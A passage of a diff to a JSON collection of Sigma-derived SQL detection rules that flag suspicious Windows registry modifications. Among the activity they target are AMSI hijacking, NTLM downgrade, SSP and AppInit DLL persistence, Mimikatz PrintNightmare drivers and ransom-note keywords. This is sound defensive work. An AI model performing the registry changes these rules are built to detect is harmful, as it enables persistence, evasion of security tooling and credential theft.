'%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1137.002" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + ], + "filename": "registry_event_hack_wce_reg.yml" + }, + { + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1070.005" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "status": "test", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.009" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.010" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218", + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND 